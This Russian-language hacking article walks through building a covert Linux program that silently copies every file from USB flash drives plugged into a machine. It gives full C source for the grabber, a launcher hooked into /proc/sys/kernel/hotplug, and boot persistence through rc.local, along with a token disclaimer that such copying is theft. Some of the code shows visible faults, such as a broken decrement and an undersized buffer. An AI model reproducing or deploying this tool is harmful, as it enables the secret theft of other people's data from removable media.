Скрытое копирование данных с флэшки
Сегодня мы будем делать из пингвина Тукса пылесос, только вместо пыли у нас будет информация, а именно - файлы с flash-накопителей, в народе просто флэшек. Сразу хочу предупредить, что копирование чужой информации без ведома владельца - это, по сути, воровство, поэтому эту статью не следует рассматривать как руководство к действию.
Я заинтересовался этой темой после прочтения статьи Криса Касперски "Предательский антивирус: грабим данные с flash-модулей и CD/DVD" (www.xakep.ru/post/40226/default.asp). В этой статье Крис описывает создание программы-граббера для Windows, маскирующегося под антивирус и под видом проверки носителя утягивающего данные с флэшки. Мы сделаем то же самое, но, во-первых, для "Линукса", а во-вторых, не будем скрываться под обёрткой антивируса (хотя я, конечно, всего лишь даю идею, дальнейшее её развитие зависит от читателя). Нам понадобятся: рабочая Linux (я использую Ubuntu 8.10, в других дистрибутивах какие-то моменты могут отличаться), компилятор gcc, руки (желательно прямые) и желание. Хочу сразу сказать, что мы не будем лезть в исходники системы, изменять стандартную утилиту mount или бить приятеля, пришедшего к тебе с флэшкой, коробкой с диском Linux, чтобы отобрать носитель.
Итак, сначала теория. Аналогом технологии Plug'n'Play Windows'а в Linux является hotplug. Hotplug - это набор скриптов, которые запускаются при подключении устройств к компьютеру. Нам эта штукенция интересна, прежде всего, наличием скрипта /proc/sys/kernel/hotplug, который запускается при подключении любого устройства. Мы будем использовать его для запуска нашего скрипта, который будет запускать граббер. К чему такие сложности? Дело в том, что скрипты из /proc/sys/kernel/hotplug исполняются сразу после подключения флэшки, однако системе требуется некоторое время, чтобы подмонтировать диск, поэтому из нашего скрипта граббер будет запускаться с небольшой задержкой.
Но как узнать, что была подключена именно флэшка? Для этого мы будем использовать утилиту hwinfo. Она выдает полную информацию обо всём железе, а при указании опций - только о конкретном наборе девайсов. Если мне не изменяет память, в стандартном комплекте Ubuntu этой утилиты нет, поэтому сначала надо её поставить:
$ sudo apt-get install hwinfo
После изучения man узнаем, что за выдачу информации о дисках отвечает ключ --disk. Посмотрим на вывод:
$ hwinfo --disk 31: SCSI 600.0: 10600 Disk [Created at block.234] UDI: /org/freedesktop/Hal/devices/storage_serial_Kingston_DataTraveler_2_0_5B7908865370_0_0 Unique ID: oE0T.7GV9h6c3JI0 Parent ID: 5YuN.JONY1UuwJT1 SysFS ID: /class/block/sdb SysFS BusID: 6:0:0:0 SysFS Device Link: /devices/pci0000:00/0000:00:1d.7/usb7/7-6/7-6:1.0/host6/target6:0:0/6:0:0:0 Hardware Class: disk Model: "Kingston DataTraveler 2.0" Vendor: usb 0x13fe "Kingston" Device: usb 0x1d00 "DataTraveler 2.0" Revision: "PMAP" Serial ID: "5B7908865370" Driver: "usb-storage", "sd" Driver Modules: "usb_storage" Device File: /dev/sdb (/dev/sg2) Device Files: /dev/sdb, /dev/disk/by-id/usb-Kingston_DataTraveler_2.0_5B7908865370-0:0, /dev/disk/by-path/pci-0000:00:1d.7-usb-0:6:1.0-scsi-0:0:0:0, /dev/block/8:16 Device Number: block 8:16-8:31 (char 21:2) Features: Hotpluggable Speed: 480 Mbps Module Alias: "usb:v13FEp1D00d0100dc00dsc00dp00ic08isc06ip50" Driver Info #0: Driver Status: libusual is active Driver Activation Cmd: "modprobe libusual" Drive status: no medium Config Status: cfg=new, avail=yes, need=no, active=unknown Attached to: #15 (USB Controller) 32: IDE 200.0: 10600 Disk [Created at block.234] UDI: /org/freedesktop/Hal/devices/storage_serial_1ATA_ST9250827AS_5RG0QCKD Unique ID: 3OOL.3bL9KT8oPs8 Parent ID: w7Y8.VU5GOIy1ynA SysFS ID: /class/block/sda SysFS BusID: 2:0:0:0 SysFS Device Link: /devices/pci0000:00/0000:00:1f.2/host2/target2:0:0/2:0:0:0 Hardware Class: disk Model: "ST9250827AS" Device: "ST9250827AS" Revision: "3.AA" Driver: "ahci", "sd" Driver Modules: "ahci" Device File: /dev/sda Device Files: /dev/sda, /dev/disk/by-id/scsi-1ATA_ST9250827AS_5RG0QCKD, /dev/disk/by-id/ata-ST9250827AS_5RG0QCKD, /dev/disk/by-path/pci-0000:00:1f.2-scsi-0:0:0:0, /dev/block/8:0 Device Number: block 8:0-8:15 Drive status: no medium Config Status: cfg=new, avail=yes, need=no, active=unknown Attached to: #11 (SATA controller) |
Ясно видно, что в системе присутствуют два диска: флэшка и SATA жёсткий диск. Внимательнее присмотревшись, замечаем, что мы можем однозначно определить тип диска ("usb_storage") и файл устройства (/dev/sdb). Итак, флэшку мы нашли. Осталось скопировать информацию. Можно, конечно, читать прямо из файла устройства, но мы поступим проще. Воспользуемся тем, что в десктопных Linux вообще и в Ubuntu, в частности, флэшки автоматически монтируются при подключении. Значит, во время запуска граббера в каталоге /media/ будет существовать каталог флэшки. Чтобы определить его имя, воспользуемся утилитой mount, которая при запуске без параметров выдаёт список смонтированных файловых систем:
$ mount /dev/sda6 on / type ext3 (rw,relatime,errors=remount-ro) tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755) /proc on /proc type proc (rw,noexec,nosuid,nodev) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) varrun on /var/run type tmpfs (rw,nosuid,mode=0755) varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777) udev on /dev type tmpfs (rw,mode=0755) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620) fusectl on /sys/fs/fuse/connections type fusectl (rw) lrm on /lib/modules/2.6.27-9-generic/volatile type tmpfs (rw,mode=755) /dev/sda5 on /media/DATA type fuseblk (rw,nosuid,nodev,allow_other,default_permissions,blksize=4096) securityfs on /sys/kernel/security type securityfs (rw) gvfs-fuse-daemon on /home/painkiller/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=painkiller) /dev/scd0 on /media/cdrom0 type udf (ro,nosuid,nodev,utf8,user=painkiller) /dev/sdb1 on /media/KINGSTON type vfat (rw,nosuid,nodev,uhelper=hal,shortname=mixed,uid=1000,utf8,umask=077,flush) |
Нас интересует последняя строчка, из которой мы видим, что флэшка смонтирована в каталог /media/KINGSTON. То, что это именно флэшка, мы видим по названию файла устройства /dev/sdb1.
Всё, сбор информации завершен, займёмся реализацией. Непосредственно копирование мы будем производить командой cp. Скопированные файлы будем класть в папку ~/grabbed. Также реализуем возможность задавать исключения, чтобы граббер не копировал файлы с твоей собственной флэшки. Для этого вернемся к выводу команды hwinfo -disk, а именно - к строчке:
Unique ID: oE0T.7GV9h6c3JI0
Это, как видно, уникальный номер устройства. Вот его и будем использовать для различия "своих" и "чужих". Итак, вот код:
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #define UNIQ_ID_STR "Unique ID: " #define DRIVER_MODULES_STR "Driver Modules: \"usb_storage\"" #define DEVICE_FILE_STR "Device File: " #define TMP_FILE_NAME "fgtmp" #define EXCLUSIONS_FILENAME "exclusions" //load exclusions char *load_excl(char *path) { FILE *f; char *out; char buff[11]; char *filename = malloc(strlen(path) + strlen(EXCLUSIONS_FILENAME) + 1); strcpy(filename, path); strcat(filename, EXCLUSIONS_FILENAME); out = NULL; f = fopen(filename, "r"); if (!f) return NULL; while (!feof(f)) { memset(buff, '\0', sizeof(buff)); fgets(buff, 10, f); out = (char *) realloc(out, ((out == NULL) ? 0: strlen(out)) + strlen(buff)); strcat(out, buff); strcat(out, "\0"); } fclose(f); return out; } //cut path from full file name char *getfilepath(char *filename) { char *fn = strdup(filename); int i = strlen(fn)-1; for (; i >= 0; i-) { if (fn[i] == '/') { fn[i+1] = '\0'; break; } } return fn; } int main(int argc, char** argv) { FILE *f; char buff[255], *exclusions, *p, devicefilename[255], finalepath[255]; int exclude = 0, savedevfile = 0; p = getfilepath(argv[0]); exclusions = load_excl(p); free(p); p = NULL; sprintf(buff, "hwinfo -disk > %s", TMP_FILE_NAME); system(buff); f = fopen(TMP_FILE_NAME, "r"); if (!f) { printf("Error while opening file"); return -1; } while (!feof(f)) { memset(buff, '\0', sizeof(buff)); fgets(buff, 254, f); if (((p = strstr(buff, UNIQ_ID_STR)) != NULL) && strstr(exclusions, (p+strlen(UNIQ_ID_STR)))) { exclude = 1; continue; } if (!savedevfile) savedevfile = ((strstr(buff, DRIVER_MODULES_STR) != NULL) && !exclude); if (((p = strstr(buff, DEVICE_FILE_STR)) != NULL) && savedevfile) { sscanf(p + strlen(DEVICE_FILE_STR), "%s", devicefilename); break; } } fclose(f); free(exclusions); sprintf(buff, "mount > %s", TMP_FILE_NAME); system(buff); f = fopen(TMP_FILE_NAME, "r"); if (!f) { printf("Error while opening file"); return -1; } while (!feof(f)) { memset(buff, '\0', sizeof(buff)); fgets(buff, 254, f); if ((p = strstr(buff, devicefilename)) != NULL) { sscanf(p + strlen(devicefilename) + 5,"%s", finalepath); strcat(finalepath, "/"); break; } } fclose(f); unlink(TMP_FILE_NAME); if (strcmp(finalepath, "")) { sprintf(buff,"mkdir ~/grabbed/ && cp %s* ~/grabbed/", finalepath); system(buff); } return 0; }
Теперь поясню некоторые моменты. Функция load_excl читает из файла список исключений, собирая путь к нему из параметра и жёстко заданного имени. Файл исключений представляет собой обычный текстовый файл, в котором на каждой строчке написан один Unique ID, т.е. в результате мы получаем указатель на строку со списком исключений, разделённых символом переноса строки. Назначение функции getfilepath понятно из названия. Функция main начинается (не считая объявления переменных) с получения пути к исполняемому файлу программы и чтения списка исключений (предполагается, что файл исключений лежит в одной папке с исполняемым файлом). Далее мы запускаем hwinfo - disk и перенаправляем её вывод во временный файл. Затем начинаем потрошить этот файл: читаем строку и проверяем, что мы прочитали - строку с уникальным номером, имя драйвера (напомню, что по нему мы определяем тип устройства) или строку с именем файла устройства. После всего этого в буфере devicefilename будет записано имя файла устройства. Далее проделываем все те же манипуляции, но для вывода команды mount, дабы получить точку монтирования флэшки. После чего выполняем команду копирования:
sprintf(buff,"mkdir ~/grabbed/ && cp %s*
~/grabbed/", finalepath);
system(buff);
Теперь осталось скомпилировать программу:
gcc -Wall -o flashgrabber flashgrabber.c
и, вставив флэшку с какими-нибудь файлами, запустить. Заработало? Хорошо. Не заработало? Ищите опечатки в коде.
Однако ручной запуск нас не устраивает, поэтому возвращаемся к ранее составленному плану. Сначала напишем скрипт, который после небольшой паузы будет запускать граббер:
$ sudo nano /usr/sbin/fg.sh
[sudo] password for painkiller:
#!/bin/bash
sleep 10
~/flashgrabber_src/flashgrabber
Естественно, сохраняем файл: CTRL+O, ENTER и выходим: CTRL+X. Теперь делаем из обычного файла скрипт :) :
$ sudo chmod +x /usr/sbin/fg.sh
Теперь сообщаем системе, что этот скрипт необходимо запускать каждый раз, когда к компьютеру подключается устройство:
$ sudo nano /proc/sys/kernel/hotplug
[sudo] password for painkiller:
/usr/sbin/fg.sh
Сохраняем, выходим. Всё, осталось лишь проверить работу: вставляем флэшку ещё раз и ищем в домашнем каталоге папку grubbed.
Однако существует небольшая проблема. Дело в том, что Ubuntu любит очищать файл /proc/sys/kernel/hotplug при запуске системы, то есть мы должны обновлять запись в файле при каждой загрузке. Сделать это можно так:
$ sudo nano /usr/sbin/refreshhp.sh
[sudo] password for painkiller:
#!/bin/bash
echo "/usr/sbin/fg.sh" > /proc/sys/kernel/hotplug
CTRL-O ENTER CTRL-X
$ sudo chmod +x /usr/sbin/refreshhp.sh
$ sudo nano /etc/rc.local
В файле /etc/rc.local могут быть вызовы других скриптов. Вызов нашего скрипта можно вставить в любое место файла до строки exit 0 (т.к. скрипт лежит в папке /usr/sbin/, полный путь можно не писать):
...
refreshhp.sh
...
exit 0
Таким вот нехитрым образом мы превратили домашнего пингвина в шпиона. Конечно, можно придумать и мирное применение нашей задумке - например, синхронизация файлов при каждом подключении личной флэшки, но дальнейшее развитие технологии целиком зависит от читателя - я всего лишь указал путь. А что будет в конце этого пути - решать вам.
PainKiller,
SASecurity gr.
[email protected]
Горячие темы